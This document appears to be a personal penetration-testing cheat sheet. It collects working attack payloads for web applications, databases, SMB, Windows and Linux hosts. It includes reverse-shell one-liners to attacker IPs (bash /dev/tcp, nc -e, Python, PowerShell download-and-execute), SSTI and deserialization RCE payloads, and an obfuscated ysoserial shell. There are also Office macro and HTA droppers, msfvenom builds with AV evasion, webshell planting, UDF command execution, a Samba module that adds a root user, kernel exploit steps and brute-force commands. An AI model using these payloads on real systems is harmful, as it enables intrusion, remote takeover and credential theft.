- `php://filter/convert.base64-encode/resource=meow.php`
- Default Session Path
- `/var/lib/php/sessions/sess_{sess_name}`
- LFI PHP_SESSION_UPLOAD_PROGRESS (From Splitline)
```python
import grequests
sess_name = 'meowmeow'
sess_path = f'/var/lib/php/sessions/sess_{sess_name}'
# sess_path = f'/var/lib/php/session/sess_{sess_name}'
# sess_path = f'/tmp/sess_{sess_name}'
base_url = 'http://{target-domain}/{target-path/randylogs.php}'
param = "file"
# code = "file_put_contents('/tmp/shell.php','<?php system($_GET[a])');"
code = '''system("bash -c 'bash -i >& /dev/tcp/{domain}/{port} 0>&1'");'''
while True:
req = [grequests.post(base_url,
files={'f': "A"*0xffff},
data={'PHP_SESSION_UPLOAD_PROGRESS': f"pwned:<?php {code} ?>"},
cookies={'PHPSESSID': sess_name}),
grequests.get(f"{base_url}?{param}={sess_path}")]
result = grequests.map(req)
if "pwned" in result[1].text:
print(result[1].text)
break
```
- [File extension](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst)
- XXE
```javascript=
var xml = '' +
'<?xml version="1.0" encoding="UTF-8"?>\n' +
'<!DOCTYPE a [ <!ENTITY b SYSTEM "file:///etc/passwd"> ]>\n' +
'<root>' +
'<name>' + "0" + '</name>' +
'<search>' + "&b;" + '</search>' +
'</root>';
```
### JSP / Tomcat
- Webshell
- https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/jsp/cmd.jsp
- `jar -cvf cmd.war cmd.jsp` and upload to Tomcat admin
- Brute force
- hydra : `hydra -L /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -P /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt -f {IP} -s {PORT} http-get /manager/html`
- msf : `scanner/http/tomcat_mgr_login`
### Django
- `manage.py`
- `{appname}`
- `settings.py`
- INSTALLED_APPS
- DATABASES
- `urls.py`
- urlpatterns
- `views`
- `{URL Urlpattern's class}`
### Werkzeug
- Debug Page RCE
- https://github.com/its-arun/Werkzeug-Debug-RCE
### Defence
- Knockd
- `/etc/knockd.conf`
- `nc` port several time to knock
### Web Shell
- PHP
- [b374k](https://github.com/b374k/b374k)
- [windows-php-reverse-shell](https://github.com/Dhayalanb/windows-php-reverse-shell)
- ASPX
- https://raw.githubusercontent.com/SecWiki/WebShell-2/master/Aspx/awen%20asp.net%20webshell.aspx
- https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/asp/cmd.aspx
- Adminer (SQLadmin)
- https://www.adminer.org/
### SSTI
#### ERB (Ruby)
- Test
- `<%= 7 * 7 %>`
- RCE
- `<%= system("whoami") %>`
#### Tornado (Python)
- Test
- `{{7*7}}`
- RCE
- `{% import os %}{{os.popen("whoami").read()}}`
#### Freemarker (Java)
- Test
- `${7*7}`
- RCE
- `${"freemarker.template.utility.Execute"?new()("whoami")}`
- Read file from sandbox
- `${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/etc/passwd').toURL().openStream().readAllBytes()?join(" ")}`
- Use Cyberchef "From Decimal" to decode
#### Handlebars (NodeJS)
- RCE
```
{{#with "s" as |string|}}
{{#with "e"}}
{{#with split as |conslist|}}
{{this.pop}}
{{this.push (lookup string.sub "constructor")}}
{{this.pop}}
{{#with string.split as |codelist|}}
{{this.pop}}
{{this.push "return require('child_process').exec('id');"}}
{{this.pop}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}
{{this}}
{{/with}}
{{/each}}
{{/with}}
{{/with}}
{{/with}}
{{/with}}
```
#### Pug (NodeJS)
Bypass keyword blacklist
```
#{function(){eval(`localLoad=global.process.mainModule.constructor._load;sh=localLoad('child`+`_process').exec('ncat 10.10.10.10 7777 -e /bin/bash')`)}()}
```
#### Jinja2 (Python)
- For flask, Django ......
- Secret key
- `{{settings.SECRET_KEY}}`
### Unserialize
#### Python
```python=
import subprocess
import pickle
class Meow(object):
def __reduce__(self):
return subprocess.check_output, (['ping', '-c', '1', '10.10.10.10'], )
a = Meow() #
print(base64.b64encode(pickle.dumps(a)))
class Meow(object):
def __reduce__(self):
return os.system, ("bash -c 'bash -i >& /dev/tcp/192.168.119.130/7877 0>&1'",)
payload = pickle.dumps(Meow())
payload = base64.b64encode(payload).decode()
```
#### ASP.Net
##### Json.Net
```
.\ysoserial.exe -g ObjectDataProvider -f Json.Net -c 'ping {My_IP}'
```
- Limitation : In `JsonConvert.DeserializeObject`, the `TypeNameHandling` in configuration `JsonSerializerSettings` must not be `None`, can be `Objects`, `Arrays`, `All`, `Auto`
### Java
- String start with
- `\xac\xed\x00\x05` or Base64 (`rO0AB`)
- ysoserial
- https://github.com/frohoff/ysoserial/releases/download/v0.0.6/ysoserial-all.jar
```dockerfile
FROM openjdk:11.0.16
COPY ysoserial-all.jar /root/ysoserial-all.jar
ENTRYPOINT ["java", "-jar", "/root/ysoserial-all.jar"]
# docker build . -t ysoserial:meow
```
- PoC
- `docker run --rm ysoserial:meow CommonsCollections3 'touch /tmp/meow'`
- Reverse shell
- `docker run --rm ysoserial:meow CommonsCollections3 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8zNS43NC42Ny4xOS82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}'`
- Note that don't add `-it` in docker
### CMS
#### Wordpress
- WPScan
- `wpscan --url {URL} --enumerate p,t,u --plugins-detection aggressive -t 30`
- enumerate
- p : plugin
- t : theme
- u : users
- t : thread
- `wpscan --url {url} --usernames {username} --passwords {password_file} -t 30`
- Enum user
- `http://{ip}/index.php/?author=1`
- plugins path
- `/wp-content/plugins/{plugin_name}`
- Password db
- `SELECT concat(user_login,":",user_pass) FROM wp_users;`
- Config file (DB Pass)
- `wp-config.php`
- Plugin Webshell
- `wget https://raw.githubusercontent.com/jckhmr/simpletools/master/wonderfulwebshell/wonderfulwebshell.php`
- `zip wonderfulwebshell.zip wonderfulwebshell.php`
- Upload and Enable
- `http://{doamin}/wp-content/plugins/wonderfulwebshell/wonderfulwebshell.php?cmd=ls`
### MySQL injection
- https://portswigger.net/web-security/sql-injection/cheat-sheet
#### SQL Command
- Limit
- `LIMIT 0,1` , `LIMIT 1,1` , `LIMIT 2,1` ...
- Select only 1 data
- `LIMIT 1 OFFSET 0`, `LIMIT 1 OFFSET 1`
- Substring
- `SUBSTRING("ABC",1,1)`
- Will return `A`
- `SUBSTRING("ABC",2,1)`
- Will return `B`
- ASCII
- `ASCII("A")`
- Will Return `65`
- Concat
- `concat(1,':',2)`
- Will return `1:2`
- Group concat
- `group_concat()`
- Concatenate multiple data to one line string
- String Length
- `length()`
- Row counts
- `count()`
- Current db
- `database()`
- Distinct item
- `distinct()`
#### Dump Data
- DB name
- `select schema_name from information_schema.schemata`
- Table name
- `select table_name from information_schema.tables where table_schema='{db_name}'`
- Column name
- `select column_name from information_schema.columns where table_name='{table_name}' and table_schema='{db_name}'`
- Select data
- `select concat({username},':',{password}) from {db_name}.{table_name}`
- Mysql User and hash
- `select concat(user,':',password) from mysql.user`
- Command dump
- `mysqldump -u {username} -h localhost -p {dbname} > a.sql`
- `--all-databases`
#### File
- Write file
- `SELECT "meow" INTO OUTFILE "/tmp/a";`
### PostgreSQL injection
- Current
- db
- `current_database()`
- schema
- `current_schema` (without `()`)
- DB names
- `SELECT datname FROM pg_database`
- Schema names
- `SELECT schemaname FROM pg_tables`
- Table names
- `SELECT tablename FROM pg_tables WHERE schemaname='{schemaname}'`
- Column name
- `SELECT column_name FROM information_schema.columns WHERE table_name='{table_name}' and table_schema='{schema name}'`
- Select Data
- `SELECT {column} FROM {SCHEMA}.{TABLE}`
- Conditional time delays
- `SELECT CASE WHEN ({condition}) THEN pg_sleep(10) ELSE pg_sleep(0) END`
- Order By
- `... ORDER BY (CASE WHEN 1=0 THEN id ELSE length(name) END)`
### MSSQL injection
#### SQL Command
- `SELECT quotename({col_name}) FROM {DB} FOR XML PATH('')`
- Like `group_concate` in MySQL
- `SELECT TOP 1 {COL_NAME} FROM {TABLE}`
- `SELECT TOP 1 {COL_NAME} FROM {TABLE} WHERE {COL_NAME} NOT IN ('A','B')`
- `SELECT {COL_NAME} FROM {DB_NAME}.dbo.{TABLE}`
- Select other DB
- `CONVERT(int,{command})`
- Error based
- Concatenation String
- `'aaa'+'bbb'`
- String length
- `LEN()`
- Current DB
- `db_name()`
#### Dump DB Name
- `DB_NAME({NUM})`
- NUM start from 1
- `SELECT name FROM master ..sysdatabases`
- `SELECT name FROM master.dbo.sysdatabases`
- One line
- `SELECT quotename(name) FROM master.dbo.sysdatabases FOR XML PATH('')`
#### Dump Table name
- One line
- `SELECT quotename(name) FROM {DB_NAME}..sysobjects where xtype='U' FOR XML PATH('')`
- Select One Data
- `SELECT TOP 1 name,NULL FROM music..sysobjects where xtype='U'`
- `and name not in ('Table_1','Table_2')`
#### Dump column name
- One line
- `SELECT quotename(name) FROM {DB_NAME}..syscolumns WHERE id=(SELECT id FROM {DB_NAME}..sysobjects WHERE name='{TABLE_NAME}') FOR XML PATH('')))) -- -`
- Select One Data
- `SELECT column_name FROM information_schema.columns WHERE table_catalog='{DB NAME}' AND table_name='{TABLE_NAME}'`
#### DB Admin
- `select concat(user,',',password),NULL from master.dbo.syslogins -- -`
### Oracle Injection
- Concatenation String
- `'aaa'||'bbb'`
- Sub string
- `SUBSTR('ABC',1,1)`
- Return `A`
- `SUBSTR('ABC',2,1)`
- Return `B`
- Union based
- Column counts, Data type must be same (`NULL`)
- Select must have `FROM`, if no item can FROM, use `dual`
- eg. `' UNION SELECT NULL,NULL,3 FROM dual --`
- Current Username
- `SELECT USER FROM dual`
- Dump DB (Schema) Names
- `SELECT DISTINCT OWNER FROM ALL_TABLES` (return multiple rows)
- Common (Normal DB) : `APEX_040200`, `MDSYS`, `SEQUELIZE`, `OUTLN`, `CTXSYS`, `OLAPSYS`, `FLOWS_FILES`, `SYSTEM`, `DVSYS`, `AUDSYS`, `DBSNMP`, `GSMADMIN_INTERNAL`, `OJVMSYS`, `ORDSYS`, `APPQOSSYS`, `XDB`, `ORDDATA`, `SYS`, `WMSYS`, `LBACSYS`
- But data may in `SYSTEM` or other existing DB
- Dump Table Names
- All : `SELECT OWNER,TABLE_NAME FROM ALL_TABLES`
- Specific DB: `SELECT TABLE_NAME FROM ALL_TABLES WHERE OWNER='{DB_NAME}'`
- Dump Column Names
- `SELECT COLUMN_NAME FROM ALL_TAB_COLUMNS WHERE TABLE_NAME='{TABLE_NAME}'`
- Select data
- `SELECT {Col1},{Col2} FROM {Table}`
- Select One line using ROWNUM (Doesn't support limit)
- eg. `SELECT NULL,COLUMN_NAME,3 FROM (SELECT ROWNUM no, TABLE_NAME, COLUMN_NAME FROM ALL_TAB_COLUMNS WHERE TABLE_NAME='WEB_ADMINS') where no=1 -- `
- no=1 2 3 ...
- DB Version
- `select version from V$INSTANCE`
- `select BANNER from v$version`
- Error Based
- ` SELECT CASE WHEN ({condition}) THEN NULL ELSE to_char(1/0) END FROM dual `
- Current DB
- `SELECT SYS.DATABASE_NAME FROM dual`
### SQLite Injection
- Version
- `sqlite_version()`
- Table
- `select name from sqlite_master WHERE type='table'`
- Column
- `select sql from sqlite_master WHERE type='table'`
- Data
- `select {Column} from {Table}`
### SSRF
- Localhost
- `localhost`
- `127.0.0.1`, `127.0.0.255`, `127.255.254.255`
### Linux
- Current process
- `/proc/self/cmdline`
### Web Socket
```python
# pip install websocket-client
from websocket import create_connection
ws = create_connection("ws://xxx.xxx.xxx.xxx/xxxx")
print(ws.recv())
ws.send("meow")
```
### Remote Debugger
#### Python
- Remote
- `pip install ptvsd`
- Add following code in source code
```python=
import ptvsd
ptvsd.enable_attach(redirect_output=True)
ptvsd.wait_for_attach()
```
- Rsync code to local
- `rsync -avh -e 'ssh -i xxx.pem' ubuntu@10.10.10.10:django`
- VSCode Auto generate Remote Attach
- Modify `connect`, `pathMappings`
#### Java Jar JDB
- Remote
- `java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=0.0.0.0:9999 -jar file.jar`
- Local
- `rlwrap jdb -attach {IP}:{Port}`
- Command
- Breakpoint
- `stop in {com.example.servingwebcontent.classname}.{function name}`
- `stop in {com.example.servingwebcontent.classname}:{Line Number}` (JD-gui)
- Show variable
- `locals`
- Set variable
- `set var=value`
- Step
- `step` next line (into function)
- `stepi` next line
- `cont` continue
#### Node.js
- Rsync copy code
- `node --inspect=0.0.0.0:9229 target.js`
- VSCode auto generate launch.json
#### .Net dnSpy
- Backup DLL first
- Right click DLL
- Edit Assembly Attribute
- edit`[assembly: Debuggable .....]`) into
```
[assembly: Debuggable(DebuggableAttribute.DebuggingModes.Default |
DebuggableAttribute.DebuggingModes.DisableOptimizations |
DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints |
DebuggableAttribute.DebuggingModes.EnableEditAndContinue)]
```
- Compile, File-> Save Module
- Debug -> Attach to Process
- `w3wp.exe`
- Debug -> Windows -> Modules
- Find the DLL
## Client Side Attack
### Office Macro
- File type : `docm` or `doc`, doesn't support `docx`
- Open cmd when start
```vba
Sub AutoOpen()
MyMacro
End Sub
Sub Document_Open()
MyMacro
End Sub
Sub MyMacro()
Dim str As String
str = "cmd /c whoami && pause"
CreateObject("Wscript.Shell").Run str
End Sub
```
- cmd path will at `system32`
- shell : `str = powershell iex (New-Object Net.WebClient).DownloadString('http://{IP}/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress {IP} -Port {PORT}`
- Reverse shell 1
- `msfvenom -p windows/shell_reverse_tcp LHOST={IP} LPORT=443 -e x86/shikata_ga_nai -f vba > shell.vba`
- First Half to macro
- Second Half to word doc
- Reverse shell 2 (macro_pack)
- `msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.247 LPORT=443 -e x86/shikata_ga_nai -f vba > shell.vba`
- [macro_pack](https://github.com/sevagas/macro_pack)
- `macro_pack.exe -f shell.vba -o -G meow.doc`
### HTA (HTML Application)
- VBS RCE
- ` <scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell iex (New-Object Net.WebClient).DownloadString('http://192.168.119.132/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.119.132 -Port 53"</scRipt>`
## Shell
### Linux Shell
- Find File
- `find / -iname {file_name} -print 2>/dev/null`
- `du -a 2>/dev/null | grep {file_name}`
- `tar cf - $PWD 2>/dev/null | tar tvf - | grep {file_name}`
### Windows Shell
- List all data
- `dir /a`
- `gci -recurse | select fullname` (Powershell)
- Short name
- `dir /x`
- Find File
- `dir {file_name} /s /p`
### Reverse Shell - Linux
- Prepare
- `nc -nvlp {port}`
- `nc -vlk {port}`
- `rlwrap nc -nvlp`
- Support left and right
- https://reverse-shell.sh/
- [Reverse Shell Cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
- Bash tcp
- `bash -c 'bash -i >& /dev/tcp/my_ip/7877 0>&1'`
- Write file in local first, and use wget/curl to get to victim machine
- `/usr/bin/wget -O - {ip:port}/{file} | /bin/bash`
- `bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}%2F{PORT}%200%3E%261%27`
- Nc
- `nc {IP} {Port} -e /bin/bash`
- Python
- `python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{IP}",{PORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")' &`
- Make it more interactively
- `python -c 'import pty; pty.spawn("/bin/bash")'`
- `perl -e 'exec "/bin/bash";'`
- Full shell (Can use vim)
- `bash` (Zsh doesn't support)
- `nc -nlvp 443` (Open Port to listening, and wait shell to conect)
- `python -c 'import pty; pty.spawn("/bin/bash")'` (Spawn shell)
- Ctrl + Z
- `stty raw -echo`
- `fg` (Will not show)
- `reset`
- Enter , Enter
- Ctrl + C
- `export SHELL=bash`
- `export TERM=xterm-256color`
- `stty rows 38 columns 116`
- js Shell Code
- `
msfvenom -p linux/x86/shell_reverse_tcp LHOST={IP} LPORT={Port} CMD=/bin/bash -f js_le -e generic/none`
- [socat](https://github.com/ernw/static-toolbox/releases/download/socat-v1.7.4.1/socat-1.7.4.1-x86)
- Server : ```socat file:`tty`,raw,echo=0 tcp-listen:{PORT}```
- Client : `./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:{IP}:{PORT}`
- Reverse SSH
- https://github.com/Fahrj/reverse-ssh
### Reverse Shell - Windows
- msfvenom
- https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/
- stage : `shell/reverse_tcp`
- msf `multi/handler` to receive
- stageless : `shell_reverse_tcp`
- `nc` to receive
- aspx
- `msfvenom -p windows/shell_reverse_tcp LHOST={IP} LPORT={PORT} -f aspx > shell.aspx`
- `msfvenom -p windows/shell/reverse_tcp LHOST={IP} LPORT={PORT} -f aspx > shell.aspx`
- exe
- `msfvenom -p windows/shell_reverse_tcp LHOST={IP} LPORT={PORT} -f exe > shell-x86.exe`
- `msfvenom -p windows/shell_reverse_tcp LHOST={IP} LPORT={PORT} -e x86/shikata_ga_nai -f exe > shell.exe`
- Anti-Anti-virus
- `msfvenom -p windows/x64/shell_reverse_tcp LHOST={IP} LPORT={PORT} -f exe -o shellx64.exe`
- Most of time, x64 system can also run x86 shell
- msi
- `msfvenom -p windows/x64/shell_reverse_tcp LHOST={IP} LPORT={Port} -f msi -o shellx64.msi`
- Install by `msiexec /quiet /i shellx64.msi`
- Powershell
- [Invoke-PowerShellTcp](https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1)
- `powershell iex (New-Object Net.WebClient).DownloadString('http://{my_ip}:{http_port}/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress {my_ip} -Port {shell_port}`
- Add `Invoke-PowerShellTcp -Reverse -IPAddress {IP} -Port {Port}` in the last line, and `powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.35/Invoke-PowerShellTcp1.ps1')`
- [mini-reverse.ps1](https://gist.github.com/Serizao/6a63f35715a8219be6b97da3e51567e7/raw/f4283f758fb720c2fe263b8f7696b896c9984fcf/mini-reverse.ps1)
- `powershell IEX (New-Object Net.WebClient).DownloadString('http://10.1.1.246/mini-reverse.ps1')`
### File Transmission - Linux
- SCP
- HTTP
- Prepare
- `python3 -m http.server`
- use `sudo` to `get` 80 port
- GET
- `wget {my_ip}:{port}/{file_name} -O {path_to_output}`
- `curl -o {path_to_output} http`
- NC
- Prepare
- `nc -l -p {attacker_port} > {file}`
- Send
- `nc {attacker_ip} {attacker_port} < {file}`
- `cat {file} > /dev/tcp/{ip}/{port}`
- TCP
- `nc -nlvp {Port} < {file}`
- `cat<'/dev/tcp/{IP}/{Port}' > {file}`
- FTP
- `python3 -m pyftpdlib -p 21 -w`
### File Transmission - Windows
- HTTP
- Prepare
- `python3 -m http.server`
- GET (Powershell)
- `wget` , `curl` , `iwr` is alias for `Invoke-WebRequest`
- `Invoke-WebRequest http://{my_ip}:{my_port}/{file} -outFile {file_name}`
- `-UseBasicParsing`
- `certutil -urlcache -f {URL} {File_name}`
- SMB
- `impacket-smbserver meow .`
- In Kali
- `-smb2support`
- `copy \\{IP}\meow\{filename} {filename}`
- In Windows
- `net view {IP}`
- Show shares
- Pack file
- cab
- `lcab -r {dir} {file.cab}`
- In kali
- `expand {file.cab} -F:* {Extract path}`
- Extract path must be absolute path like `C:\Windows\Temp`
- https://blog.ropnop.com/transferring-files-from-kali-to-windows/
## Server
### Redis
- Write shell / file
- `redis-cli -h {ip} `
- Connect
- `config set dir "/var/www/html"`
- Set dir
- `config set dbfilename meow.php`
- Set file name
- `set x "\r\n\r\n<?php system($_GET[A]);?>\r\n\r\n"`
- Write web shell
- `save`
- Save file
### MySQL
#### Exploit
- User-Defined Function (UDF) Dynamic Library
- `SHOW VARIABLES LIKE 'plugin_dir';`
- Check plugin dir
- Write File Method (1)
- `use mysql;`
- `create table hack(line blob);`
- `insert into hack values(load_file('/tmp/lib_sys_udf.so'));`
- File From https://github.com/zinzloun/MySQL-UDF-PrivEsc (https://www.exploit-db.com/exploits/1518)
- `select * from hack into dumpfile '/{plugin_dir}/lib_sys_udf.so';`
- Write File Method (2)
- `xxd -p -c 9999999 lib_sys_udf.so`
- `SET @SHELL=0x{.....}`
- `SHOW VARIABLES LIKE 'plugin_dir';`
- `SELECT BINARY @SHELL INTO DUMPFILE '{PLUGIN_DIR}/meow.so';`
- `create function do_system returns integer soname 'lib_sys_udf.so';`
- `select do_system("{Bash script}");`
- Not show return
#### Logging
- Conf File
- `/etc/my.cnf.d/mysql-server.cnf` (Centos)
- `/etc/mysql/my.cnf` (Debian)
- Add 2 line
- `general_log_file=/var/log/mysql/mysql_log.log`
- `general_log=1`
- Restart services
- `sudo systemctl restart mysqld`
- See Log
- `tail -f /var/log/mysql/mysql_log.log`
### MSSQL
- Connect
- `impacket-mssqlclient -p {port} {UserID}@{IP} -windows-auth`
- Default port : 1433
- Shell
- `exec xp_cmdshell '{Command}'`
- `exec xp_cmdshell '\\192.168.119.210\meow\s443.exe'`
- `exec` doesn't need escape character
- `xp_cmdshell(net users)`
- Can also work but can't `\`
- If no permission
```
EXEC sp_configure 'show advanced options',1
RECONFIGURE
EXEC sp_configure 'xp_cmdshell',1
RECONFIGURE
```
#### Backup
- `C:\Program Files\Microsoft SQL Server\MSSQL14.SQLEXPRESS\MSSQL\Backup/master.mdf`
- Or short path `C:/PROGRA~1/MICROS~1/MSSQL1~1.SQL/MSSQL/Backup/master.mdf`
- [Invoke-MDFHashes](https://github.com/xpn/Powershell-PostExploitation/tree/master/Invoke-MDFHashes)
- `Add-Type -Path 'OrcaMDF.RawCore.dll'`
- `Add-Type -Path 'OrcaMDF.Framework.dll'`
- `import-module .\Get-MDFHashes.ps1`
- `Get-MDFHashes -mdf "C:\Users\Administrator\Desktop\master.mdf" | Format-List`
- Use john
### Oracle
- Default Port 1521
- Check version
- `nmap --script "oracle-tns-version" -p 1521 -T4 -sV {IP}`
- Brute Force SID
- `hydra -L sids-oracle.txt -s 1521 {IP} oracle-sid`
- [oracle-sid.txt](https://firebasestorage.googleapis.com/v0/b/gitbook-28427.appspot.com/o/assets%2F-L_2uGJGU7AVNRcqRvEi%2F-LcreDSG0Hi8mv8n8DIw%2F-LcrnYv40ILvFrpjKRkb%2Fsids-oracle.txt?alt=media&token=8206a9f6-af86-4a49-ac71-179ca973d836)
- `odat sidguesser -s "{IP}" -p 1521`
- Connection
- `tnscmd10g status --10G -p {port} -h {IP}`
- [ODAT](https://github.com/quentinhardy/odat/releases)
- Brute Force Username and Password
- `./odat all -s {IP} -p {PORT} -d {SID}`
- `--accounts-file`
- `patator oracle_login sid={SID} host={IP} user=FILE0 password=FILE1 0=~/Wordlist/users-oracle.txt 1=~/Wordlist/pass-oracle.txt`
- `odat all -s 10.11.1.222 -p 1521 -d XEXDB`
- RCE
- `odat-libc2.12-x86_64 ./odat-libc2.12-x86_64 dbmsscheduler -U {Username} -P {Password} -d {SID} -s {IP} --sysdba --exec "{command}" `
### PostgreSQL
#### Log
- `/etc/postgresql/{version}/main/postgresql.conf`
- `log_statement = 'all'`
- `systemctl restart postgresql`
- `tail -f /var/log/postgresql/postgresql-10-main.log`
#### UDF
- https://github.com/martinvw/pg_exec/tree/master/libraries
- Download `.so` file
- Put them into `/tmp/pg_exec.so`
```python=
def do_query(command):
pass # implement by yourself
loid = 1234
def delete_lo():
command = f"SELECT lo_unlink({loid})"
do_query(command)
delete_lo()
def create_lo():
command = f"SELECT lo_create({loid});"
do_query(command)
create_lo()
pg_exec_binary = open("pg_exec.so",'rb').read()
udf = pg_exec_binary.hex()
def inject_udf():
for i in range(0,int(round(len(udf)/4096))+1): # Done
udf_chunk = udf[i*4096:(i+1)*4096]
if len(udf_chunk) == 4096:
sql = f"INSERT INTO pg_largeobject (loid, pageno, data) values ({loid}, {i}, decode('{udf_chunk}', 'hex'))"
do_query(sql)
inject_udf()
def lo_export():
command = "SELECT lo_export(1234,'/tmp/pg_exec.so');"
do_query(command)
lo_export()
```
- `CREATE FUNCTION sys(cstring) RETURNS int as '/tmp/pg_exec.so', 'pg_exec' LANGUAGE 'c' STRICT;`
- `SELECT sys($$bash -c "bash -i >& /dev/tcp/10.10.10.10/7777 0>&1"$$);`
### SMB
- smb to shell
- `winexe -U '{username}' //{ip} cmd.exe`
- `impacket-smbexec '{username}:{password}'@{ip}`
- `impacket-psexec {username}:{password}'@{ip}`
- Check version
- `nmap -p139,445 --script smb-os-discovery -Pn {IP}`
- Open Wireshark
- `smbclient -N -L "//{IP}/" --option='client min protocol=nt1'`
- msf
- `scanner/smb/smb_version`
- CVE-2017-7494 SambaCry , linux/samba/is_known_pipename
- Check vuln
- `nmap --script smb-vuln-cve-2017-7494 --script-args smb-vuln-cve-2017-7494.check-version -p445 -Pn {IP}`
- Check share dir
- `nmap --script=smb-enum-shares -p445 -Pn {IP}`
- https://github.com/joxeankoret/CVE-2017-7494
- `python2 cve_2017_7494.py -t 10.11.1.146 --custom command.so`
- `gcc -o command.so -shared command.c -fPIC`
- ```C=
#include <stdio.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <stdlib.h>
#include <sys/stat.h>
int samba_init_module(void)
{
setresuid(0,0,0);
system("echo root1:yeDupmFJ8ut/w:0:0:root:/root:/bin/bash >> /etc/passwd");
return 0;
}
```
- List user
- `nmap --script smb-enum-users.nse -p445 {IP}`
- Low Version
- `--option='client min protocol=nt1'`
- If got `NT_STATUS_CONNECTION_DISCONNECTED`
- Symlink Directory Traversal ( < 3.4.5)
- Tested on 3.0.24
- https://github.com/roughiz/Symlink-Directory-Traversal-smb-manually
- Samba 2.2.x - Remote Buffer Overflow
- Tested on 2.2.7a
- https://www.exploit-db.com/exploits/7
- Scan
- `python3 enum4linux-ng.py -A {IP}`
### Pop3
- `nmap -Pn --script "pop3-capabilities or pop3-ntlm-info" -sV -p{PORT}`
- Dump
- `PGPASSWORD="{PASSWORD}" pg_dump {DB_NAME} > test.dump`
### FTP
- Home FTP
- [Home FTP Server 1.12 - Directory Traversal](https://www.exploit-db.com/exploits/16259)
- [Home FTP File Download](https://webcache.googleusercontent.com/search?q=cache:92M05_e2PYcJ:https://github.com/BuddhaLabs/PacketStorm-Exploits/blob/master/0911-exploits/homeftpserver-traversal.txt+&cd=4&hl=zh-TW&ct=clnk&gl=tw&client=firefox-b-d)
- FileZilla
- Default password location
- `C:\Program Files\FileZilla Server\FileZilla Server.xml`
- maybe `(x86)`
- WINRM (5985 port)
- `sudo gem install evil-winrm`
- `evil-winrm -t {IP} -u {User} -p {pass}`
### RDP
- Enable
- `reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f`
- `netsh advfirewall firewall set rule group="remote desktop" new enable=yes`
- Add User To RDP Group
- `net localgroup "Remote Desktop Users" "{USER_NAME}" /add`
## Privilege - Linux
### Kernel Exploit
- [CVE-2017-16995](https://github.com/rlarabee/exploits/tree/master/cve-2017-16995)
- Test on Kernel 4.4.0 (4.4.0-116-generic)
- `gcc cve-2017-16995.c -o cve-2017-16995`
- [CVE-2012-0056 (memodipper)](https://github.com/lucyoa/kernel-exploits/blob/master/memodipper/memodipper.c)
- `gcc memodipper.c -o m.out`
- [CVE-2010-2959 (i-can-haz-modharden)](https://raw.githubusercontent.com/macubergeek/ctf/master/privilege%20escalation/i-can-haz-modharden.c)
- Compile for old OS
- `gcc -m32 ./{INPUT.c) -o {OUTPUT} -Wl,--hash-style=both`
- `-static`
- CVE-2021-4034 (pkexec) (pwnkit)
- https://haxx.in/files/blasty-vs-pkexec.c
- `gcc blasty-vs-pkexec.c -o meow`
- `source <(wget https://raw.githubusercontent.com/azminawwar/CVE-2021-4034/main/exploit.sh -O -)`
- https://github.com/ly4k/PwnKit/raw/main/PwnKit
- `chmod +x ./PwnKit`
- `./PwnKit`
- [CVE-2016-5195 (dirtycow)](https://www.exploit-db.com/download/40611)
- ```
gcc -pthread 40611.c -o dirtyc0w
./dirtyc0w /etc/passwd "root1:yeDupmFJ8ut/w:0:0:root:/root:/bin/bash
"
```
- [CVE-2015-1328 (overlayfs)](https://www.exploit-db.com/download/37292)
- Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15
- `gcc ofs.c -o ofs`
- `./ofs`
- lxd group
- `id` -> user has lxd group
- `wget https://github.com/saghul/lxd-alpine-builder/raw/master/alpine-v3.13-x86_64-20210218_0139.tar.gz -O alpine.tar.gz`
- `lxc image import alpine.tar.gz --alias alpine`
- `lxc init alpine privesc -c security.privileged=true`
- `lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true`
- `lxc start privesc`
- `lxc exec privesc /bin/sh`
- `cd /mnt/root ....`
### Software
- [GTFOBins](https://gtfobins.github.io/)
- Linux privileges escalation
- [Pspy](https://github.com/DominicBreuker/pspy)
- Monitor the process
#### Enumeration
Scan the system to find which can be use for privileges escalation
- [PEASS-ng](https://github.com/carlospolop/PEASS-ng)
- [LinEnum](https://github.com/rebootuser/LinEnum)
- [LSE](https://github.com/diego-treitos/linux-smart-enumeration)
- [Linux-Exploit-Suggester (LES)](https://github.com/mzet-/linux-exploit-suggester)
### Tips
- Writable `/etc/passwd`
- Append `root1:yeDupmFJ8ut/w:0:0:root:/root:/bin/bash` to file
- `root1` : `meow`
- Generate hash : `openssl passwd {PASSWORD}`
- Add User
- `useradd -p $(openssl passwd -1 meow) root1`
